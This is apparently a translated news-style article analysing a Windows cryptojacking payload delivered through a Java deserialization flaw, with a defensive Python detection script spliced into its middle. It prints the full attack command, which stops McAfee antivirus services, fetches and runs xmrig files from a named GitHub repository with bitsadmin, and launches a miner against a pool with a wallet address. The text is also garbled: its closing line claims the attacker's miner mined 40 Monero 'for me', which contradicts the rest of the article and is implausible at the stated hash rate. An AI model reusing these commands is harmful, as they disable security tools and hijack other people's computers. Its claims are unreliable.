2025-09-19 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/02 Report
In this issue we look at how a Java deserialization vulnerability was used in an experiment on Windows. The article walks through the payload from a professional perspective; I hope you take something away from it.
Recently there has been a lot of discussion in the security community about exploiting Java deserialization vulnerabilities to attack systems such as Apache, SOLR, and LOGY. Let's get straight to the point: the vast majority of these attacks currently target Linux/Unix systems, but I recently discovered one that targets Windows.
The attack code is as follows:
cmd /c net stop "McAfee McShield";net stop mcafeeframework;bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat "%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe "%cd%\xmrig.exe";dir xmrig*;xmrig.bat;tasklist;
Actual Payload Analysis
Stop the McAfee antivirus services (I don't understand why this payload only bothers to stop McAfee…):
net stop "McAfee McShield";net stop mcafeeframework;
Download the cryptocurrency miner and a batch script from GitHub using bitsadmin, then list and run them:
bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat "%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe "%cd%\xmrig.exe";dir xmrig*;xmrig.bat;tasklist;
The batch file contains the following:
taskkill /im /f xmrig.exe /t
net stop "McAfee McShield"
net stop mcafeeframework
xmrig.exe -o monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6 -p x --background --max-cpu-usage=50 --donate-level=1
The batch file first terminates any other xmrig processes (presumably to avoid resource contention), then stops McAfee, and finally launches the miner, which connects to the monerohash.com pool on port 3333. The miner is capped at about 50% CPU usage, presumably to avoid attracting attention.
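As an added defensive example (not part of the original article), the following Python script scores process command lines against the behaviours described above: stopping the McAfee services, a bitsadmin /transfer download from raw.githubusercontent.com, xmrig artifacts, the pool connection on port 3333, the CPU cap, and the taskkill of rival miners. The sample events, the indicator names, the GitHub path and the wallet value are constructed placeholders.

```python
import re

# Indicators distilled from the payload analysed above (patterns are constructed).
INDICATORS = {
    "av_service_stop":    re.compile(r'net\s+stop\s+"?(mcafee|mcshield)', re.I),
    "bitsadmin_download": re.compile(r"bitsadmin(\.exe)?\s+/transfer\b.*?/download", re.I),
    "raw_github_fetch":   re.compile(r"raw\.githubusercontent\.com/", re.I),
    "xmrig_artifact":     re.compile(r"\bxmrig(\.exe|\.bat)?\b", re.I),
    "mining_pool":        re.compile(r"(monerohash\.com|\S+:3333\b)", re.I),
    "cpu_throttle":       re.compile(r"--max-cpu-usage=\d+", re.I),
    "kill_rival_miner":   re.compile(r"taskkill\b.*\bxmrig", re.I),
}


def match_indicators(cmdline):
    """Return the indicator names found in one process command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def triage(events, min_hits=2):
    """Flag events whose command line carries at least min_hits indicators.

    events: iterable of (pid, image, cmdline) tuples, as you would extract
    from Sysmon event 1 or Security event 4688. A single weak indicator
    (one bitsadmin download) is not enough; the combination is.
    Returns a list of (pid, hits) for flagged events.
    """
    flagged = []
    for pid, image, cmdline in events:
        hits = match_indicators(cmdline)
        if len(hits) >= min_hits:
            flagged.append((pid, hits))
    return flagged


# Constructed sample events (not real telemetry), modelled on the chain above.
SAMPLE_EVENTS = [
    (1001, "svchost.exe", r"C:\Windows\system32\svchost.exe -k netsvcs -p"),
    (1002, "bitsadmin.exe", "bitsadmin /transfer job1 /download /priority normal "
                            r"https://updates.example.org/pkg.msi C:\temp\pkg.msi"),
    (4120, "cmd.exe", 'cmd /c net stop "McAfee McShield" & net stop mcafeeframework & '
                      "bitsadmin.exe /transfer xmrig.bat /download /priority foreground "
                      r"http://raw.githubusercontent.com/EXAMPLE/repo/master/xmrig.bat %cd%\xmrig.bat"),
    (4133, "xmrig.exe", "xmrig.exe -o monerohash.com:3333 -u WALLET_PLACEHOLDER -p x "
                        "--background --max-cpu-usage=50 --donate-level=1"),
    (4135, "taskkill.exe", "taskkill /im xmrig.exe /f /t"),
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: {', '.join(hits)}")
```

The benign bitsadmin download (pid 1002) scores one hit and is not flagged; the three stages of the chain each score two or more.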
So far this miner has only managed about 350 hashes per second, and has mined 40 Monero coins (worth about $7000) for me.
That is how a Java deserialization vulnerability was used in this experiment on Windows; if you run into something similar, the analysis above may help you make sense of it.